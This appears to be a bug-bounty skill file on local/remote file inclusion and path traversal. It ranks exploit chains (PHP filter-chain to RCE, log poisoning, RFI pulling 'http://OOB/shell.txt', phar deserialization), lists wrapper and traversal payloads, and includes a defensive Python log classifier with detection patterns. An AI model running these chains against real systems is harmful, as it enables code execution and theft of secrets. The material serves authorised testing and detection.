hunt-lfi


HUNT-LFI — Local / Remote File Inclusion & Path Traversal

Crown Jewel Targets

LFI that reaches code execution is Critical. Pure file-read is High when it exposes secrets (.env, wp-config.php, private keys, cloud creds), Medium when it only reads non-sensitive files.

Highest-value chains (in rough order of reliability in 2026):

  • PHP filter-chain → RCE — the modern default. A bare php://filter file-read primitive is upgraded to RCE with no upload endpoint and no writable file by chaining iconv conversions to forge an arbitrary PHP payload in-memory (Synacktiv, 2022). See the dedicated section below. This is the single most impactful thing to try and the most-missed.
  • Log poisoning → RCE — inject PHP into an Apache/Nginx log (User-Agent / URL path), then include the log. Increasingly blocked by open_basedir and unreadable log perms, so verify the log is readable first.
  • PHP wrappers → source disclosure: php://filter/convert.base64-encode/resource=index.php leaks source; read source to find more LFI sinks, secrets, and the include base path.
  • RFI → RCE — when allow_url_include=On, ?file=http://OOB/shell.txt pulls and executes remote code. Rare on modern configs but trivially Critical when present.
  • phar:// deserialization — a crafted PHAR + any unserialize-on-metadata sink → object-injection RCE.
  • zip:// / data:// chains and session/upload poisoning when filters block wrappers.
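
Detection-side view of the chains above, as an added example that is not part of the original skill file: a Python pass over access-log lines that flags the wrapper, traversal, remote-include and PHP-tag patterns those chains depend on. The rule names, the iconv-stage threshold, the placeholder charset names and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined log format; rule names and the threshold are this example's assumptions.
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
RULES = [
    ("php-filter-wrapper", re.compile(r"php://filter", re.I)),
    ("archive-or-data-wrapper", re.compile(r"(phar|zip|data)://", re.I)),
    ("remote-include", re.compile(r"[?&][^=&]*=(https?|ftp)://", re.I)),
    ("path-traversal", re.compile(r"\.\.[/\\]")),
]
PHP_TAG = re.compile(r"<\?(php|=)", re.I)
ICONV_STAGES = 4  # assumed: a source read needs one filter, a chain stacks many


def decode(value, rounds=3):
    """Percent-decode a bounded number of times so double encoding is normalized."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def classify(line):
    """Return the names of the rules that one access-log line trips."""
    m = LOG_RE.search(line)
    if not m:
        return []
    target, ua = decode(m["target"]), decode(m["ua"])
    hits = [name for name, rx in RULES if rx.search(target)]
    if target.lower().count("convert.iconv.") >= ICONV_STAGES:
        hits.append("iconv-filter-chain")
    if PHP_TAG.search(target) or PHP_TAG.search(ua):
        hits.append("php-tag-in-logged-field")
    return hits


def sample(target, ua="Mozilla/5.0"):
    """Build one constructed combined-format log line."""
    return f'203.0.113.5 - - [01/Jan/2026:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512 "-" "{ua}"'


SAMPLES = [  # constructed inputs; charset names A.B etc. are placeholders
    sample("/index.php?page=about"),
    sample("/index.php?page=php://filter/convert.base64-encode/resource=index.php"),
    sample("/index.php?page=php://filter/convert.iconv.A.B%7Cconvert.iconv.C.D%7Cconvert.iconv.E.F%7Cconvert.iconv.G.H/resource=x"),
    sample("/index.php?page=%252e%252e%252fetc%252fpasswd"),
    sample("/index.php?page=about", "<?php /*marker*/ ?>"),
]
```

Call `classify()` on each line of a web server access log; an empty list means no rule fired. A hit on `php-tag-in-logged-field` matters most on hosts where the web server user can read its own logs, which is the precondition the log-poisoning item calls out.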

OOB / Blind-LFI Confirmation Gate (Read First)

LFI is frequently blind: the included content is parsed/executed but never reflected, or the page swallows the file into a template you can't see. Do not claim LFI from indirect signals alone.

First Seen
Jun 5, 2026
hunt-lfi — elementalsouls/claude-bughunter